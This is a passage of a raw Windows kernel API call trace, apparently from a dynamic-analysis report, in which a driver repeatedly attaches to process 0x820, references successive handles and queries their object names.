Process=0xffffd000ac0cf388) returned 0x0 [0290.095] PsAcquireProcessExitSynchronization () returned 0x0 [0290.095] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.095] ObReferenceObjectByHandle (in: Handle=0xed8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0444b0, HandleInformation=0x0) returned 0x0 [0290.095] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.095] PsReleaseProcessExitSynchronization () returned 0x2 [0290.095] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6ea [0290.095] ObQueryNameString (in: Object=0xffffe0006a0444b0, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.095] ObfDereferenceObject (Object=0xffffe0006a0444b0) returned 0x7ffe [0290.095] IoCompleteRequest () returned 0x0 [0290.095] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.095] PsAcquireProcessExitSynchronization () returned 0x0 [0290.095] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.095] ObReferenceObjectByHandle (in: Handle=0xf1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007c2fd980, HandleInformation=0x0) returned 0x0 [0290.095] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.095] PsReleaseProcessExitSynchronization () returned 0x2 [0290.095] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6e9 [0290.095] ObQueryNameString (in: Object=0xffffe0007c2fd980, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.095] ObfDereferenceObject (Object=0xffffe0007c2fd980) returned 0x7ffe [0290.095] IoCompleteRequest () returned 0x0 [0290.095] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.095] PsAcquireProcessExitSynchronization () returned 0x0 [0290.095] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.095] ObReferenceObjectByHandle (in: Handle=0xf40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a256090, HandleInformation=0x0) returned 0x0 [0290.095] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.095] PsReleaseProcessExitSynchronization () returned 0x2 [0290.095] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6e8 [0290.095] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.095] ObfDereferenceObject (Object=0xffffe0006a256090) returned 0x7fe8 [0290.095] IoCompleteRequest () returned 0x0 [0290.095] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.095] PsAcquireProcessExitSynchronization () returned 0x0 [0290.095] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.096] ObReferenceObjectByHandle (in: Handle=0xf48, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bcf090, HandleInformation=0x0) returned 0x0 [0290.096] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.096] PsReleaseProcessExitSynchronization () returned 0x2 [0290.096] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6e7 [0290.096] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.096] ObfDereferenceObject (Object=0xffffe00069bcf090) returned 0x7ff2 [0290.096] IoCompleteRequest () returned 0x0 [0290.096] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.096] PsAcquireProcessExitSynchronization () returned 0x0 [0290.096] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.096] ObReferenceObjectByHandle (in: Handle=0xfc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2fd090, HandleInformation=0x0) returned 0x0 [0290.096] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.096] PsReleaseProcessExitSynchronization () returned 0x2 [0290.096] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6e6 [0290.096] ObQueryNameString (in: Object=0xffffe0006a2fd090, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.096] ObfDereferenceObject (Object=0xffffe0006a2fd090) returned 0x7ffd [0290.096] IoCompleteRequest () returned 0x0 [0290.096] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.096] PsAcquireProcessExitSynchronization () returned 0x0 [0290.096] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.096] ObReferenceObjectByHandle (in: Handle=0xfd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2f8680, HandleInformation=0x0) returned 0x0 [0290.096] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.096] PsReleaseProcessExitSynchronization () returned 0x2 [0290.096] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6e5 [0290.096] ObQueryNameString (in: Object=0xffffe0006a2f8680, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.096] ObfDereferenceObject (Object=0xffffe0006a2f8680) returned 0x7ffd [0290.096] IoCompleteRequest () returned 0x0 [0290.096] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.096] PsAcquireProcessExitSynchronization () returned 0x0 [0290.096] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.096] ObReferenceObjectByHandle (in: Handle=0x1060, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2f5f20, HandleInformation=0x0) returned 0x0 [0290.096] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.096] PsReleaseProcessExitSynchronization () returned 0x2 [0290.096] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6e4 [0290.096] ObQueryNameString (in: Object=0xffffe0006a2f5f20, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.096] ObfDereferenceObject (Object=0xffffe0006a2f5f20) returned 0x7ffe [0290.096] IoCompleteRequest () returned 0x0 [0290.096] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.096] PsAcquireProcessExitSynchronization () returned 0x0 [0290.096] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.096] ObReferenceObjectByHandle (in: Handle=0x1068, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2f0360, HandleInformation=0x0) returned 0x0 [0290.096] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.096] PsReleaseProcessExitSynchronization () returned 0x2 [0290.096] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6e3 [0290.097] ObQueryNameString (in: Object=0xffffe0006a2f0360, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.097] ObfDereferenceObject (Object=0xffffe0006a2f0360) returned 0x800e [0290.097] IoCompleteRequest () returned 0x0 [0290.097] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.097] PsAcquireProcessExitSynchronization () returned 0x0 [0290.097] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.097] ObReferenceObjectByHandle (in: Handle=0x106c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2f2c40, HandleInformation=0x0) returned 0x0 [0290.097] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.097] PsReleaseProcessExitSynchronization () returned 0x2 [0290.097] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6e2 [0290.097] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.097] ObfDereferenceObject (Object=0xffffe0006a2f2c40) returned 0x7fff [0290.097] IoCompleteRequest () returned 0x0 [0290.097] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.097] PsAcquireProcessExitSynchronization () returned 0x0 [0290.097] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.097] ObReferenceObjectByHandle (in: Handle=0x10a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2f6660, HandleInformation=0x0) returned 0x0 [0290.097] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.097] PsReleaseProcessExitSynchronization () returned 0x2 [0290.097] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6e1 [0290.097] ObQueryNameString (in: Object=0xffffe0006a2f6660, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.097] ObfDereferenceObject (Object=0xffffe0006a2f6660) returned 0x7ffd [0290.097] IoCompleteRequest () returned 0x0 [0290.097] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.097] PsAcquireProcessExitSynchronization () returned 0x0 [0290.097] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.097] ObReferenceObjectByHandle (in: Handle=0x10bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2f37e0, HandleInformation=0x0) returned 0x0 [0290.097] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.097] PsReleaseProcessExitSynchronization () returned 0x2 [0290.097] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6e0 [0290.097] ObQueryNameString (in: Object=0xffffe0006a2f37e0, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.097] ObfDereferenceObject (Object=0xffffe0006a2f37e0) returned 0x7ffe [0290.097] IoCompleteRequest () returned 0x0 [0290.097] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.097] PsAcquireProcessExitSynchronization () returned 0x0 [0290.097] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.097] ObReferenceObjectByHandle (in: Handle=0x10c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2f5db0, HandleInformation=0x0) returned 0x0 [0290.097] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.097] PsReleaseProcessExitSynchronization () returned 0x2 [0290.097] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6df [0290.097] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.097] ObfDereferenceObject (Object=0xffffe0006a2f5db0) returned 0x7fff [0290.097] IoCompleteRequest () returned 0x0 [0290.098] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.098] PsAcquireProcessExitSynchronization () returned 0x0 [0290.098] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.098] ObReferenceObjectByHandle (in: Handle=0x10cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2f76d0, HandleInformation=0x0) returned 0x0 [0290.098] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.098] PsReleaseProcessExitSynchronization () returned 0x2 [0290.098] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6de [0290.098] ObQueryNameString (in: Object=0xffffe0006a2f76d0, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.098] ObfDereferenceObject (Object=0xffffe0006a2f76d0) returned 0x7ffe [0290.098] IoCompleteRequest () returned 0x0 [0290.098] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.098] PsAcquireProcessExitSynchronization () returned 0x0 [0290.098] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.098] ObReferenceObjectByHandle (in: Handle=0x1108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a111310, HandleInformation=0x0) returned 0x0 [0290.098] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.098] PsReleaseProcessExitSynchronization () returned 0x2 [0290.098] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6dd [0290.098] ObQueryNameString (in: Object=0xffffe0006a111310, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.098] ObfDereferenceObject (Object=0xffffe0006a111310) returned 0x7ffe [0290.098] IoCompleteRequest () returned 0x0 [0290.098] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.098] PsAcquireProcessExitSynchronization () returned 0x0 [0290.098] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.098] ObReferenceObjectByHandle (in: Handle=0x110c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a111480, HandleInformation=0x0) returned 0x0 [0290.098] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.098] PsReleaseProcessExitSynchronization () returned 0x2 [0290.098] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6dc [0290.098] ObQueryNameString (in: Object=0xffffe0006a111480, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.098] ObfDereferenceObject (Object=0xffffe0006a111480) returned 0x7ffe [0290.098] IoCompleteRequest () returned 0x0 [0290.098] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.098] PsAcquireProcessExitSynchronization () returned 0x0 [0290.098] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.098] ObReferenceObjectByHandle (in: Handle=0x115c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a3008b0, HandleInformation=0x0) returned 0x0 [0290.098] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.098] PsReleaseProcessExitSynchronization () returned 0x2 [0290.098] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6db [0290.098] ObQueryNameString (in: Object=0xffffe0006a3008b0, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.098] ObfDereferenceObject (Object=0xffffe0006a3008b0) returned 0x7ffc [0290.098] IoCompleteRequest () returned 0x0 [0290.098] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.098] PsAcquireProcessExitSynchronization () returned 0x0 [0290.098] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.098] ObReferenceObjectByHandle (in: Handle=0x119c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a7058b0, HandleInformation=0x0) returned 0x0 [0290.098] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.099] PsReleaseProcessExitSynchronization () returned 0x2 [0290.099] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6da [0290.099] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.099] ObfDereferenceObject (Object=0xffffe0006a7058b0) returned 0x7ffc [0290.099] IoCompleteRequest () returned 0x0 [0290.099] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.099] PsAcquireProcessExitSynchronization () returned 0x0 [0290.099] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.099] ObReferenceObjectByHandle (in: Handle=0x11b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a301db0, HandleInformation=0x0) returned 0x0 [0290.099] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.099] PsReleaseProcessExitSynchronization () returned 0x2 [0290.099] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6d9 [0290.099] ObQueryNameString (in: Object=0xffffe0006a301db0, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.099] ObfDereferenceObject (Object=0xffffe0006a301db0) returned 0x7fef [0290.099] IoCompleteRequest () returned 0x0 [0290.099] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.099] PsAcquireProcessExitSynchronization () returned 0x0 [0290.099] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.099] ObReferenceObjectByHandle (in: Handle=0x11b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a303f20, HandleInformation=0x0) returned 0x0 [0290.099] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.099] PsReleaseProcessExitSynchronization () returned 0x2 [0290.099] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6d8 [0290.099] ObQueryNameString (in: Object=0xffffe0006a303f20, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.099] ObfDereferenceObject (Object=0xffffe0006a303f20) returned 0x7ff8 [0290.099] IoCompleteRequest () returned 0x0 [0290.099] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.099] PsAcquireProcessExitSynchronization () returned 0x0 [0290.099] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.099] ObReferenceObjectByHandle (in: Handle=0x11b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a300310, HandleInformation=0x0) returned 0x0 [0290.099] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.099] PsReleaseProcessExitSynchronization () returned 0x2 [0290.099] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6d7 [0290.099] ObQueryNameString (in: Object=0xffffe0006a300310, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.099] ObfDereferenceObject (Object=0xffffe0006a300310) returned 0x7ffc [0290.099] IoCompleteRequest () returned 0x0 [0290.099] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.099] PsAcquireProcessExitSynchronization () returned 0x0 [0290.099] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.099] ObReferenceObjectByHandle (in: Handle=0x11bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a303aa0, HandleInformation=0x0) returned 0x0 [0290.099] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.099] PsReleaseProcessExitSynchronization () returned 0x2 [0290.099] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6d6 [0290.099] ObQueryNameString (in: Object=0xffffe0006a303aa0, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.099] ObfDereferenceObject (Object=0xffffe0006a303aa0) returned 0x7ffc [0290.099] IoCompleteRequest () returned 0x0 [0290.100] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.100] PsAcquireProcessExitSynchronization () returned 0x0 [0290.100] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.100] ObReferenceObjectByHandle (in: Handle=0x11e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a302400, HandleInformation=0x0) returned 0x0 [0290.100] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.100] PsReleaseProcessExitSynchronization () returned 0x2 [0290.100] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6d5 [0290.100] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.100] ObfDereferenceObject (Object=0xffffe0006a302400) returned 0x7fff [0290.100] IoCompleteRequest () returned 0x0 [0290.100] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.100] PsAcquireProcessExitSynchronization () returned 0x0 [0290.100] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.100] ObReferenceObjectByHandle (in: Handle=0x11e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a3017c0, HandleInformation=0x0) returned 0x0 [0290.100] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.100] PsReleaseProcessExitSynchronization () returned 0x2 [0290.100] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6d4 [0290.100] ObQueryNameString (in: Object=0xffffe0006a3017c0, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.100] ObfDereferenceObject (Object=0xffffe0006a3017c0) returned 0x7ffe [0290.100] IoCompleteRequest () returned 0x0 [0290.100] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.100] PsAcquireProcessExitSynchronization () returned 0x0 [0290.100] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, 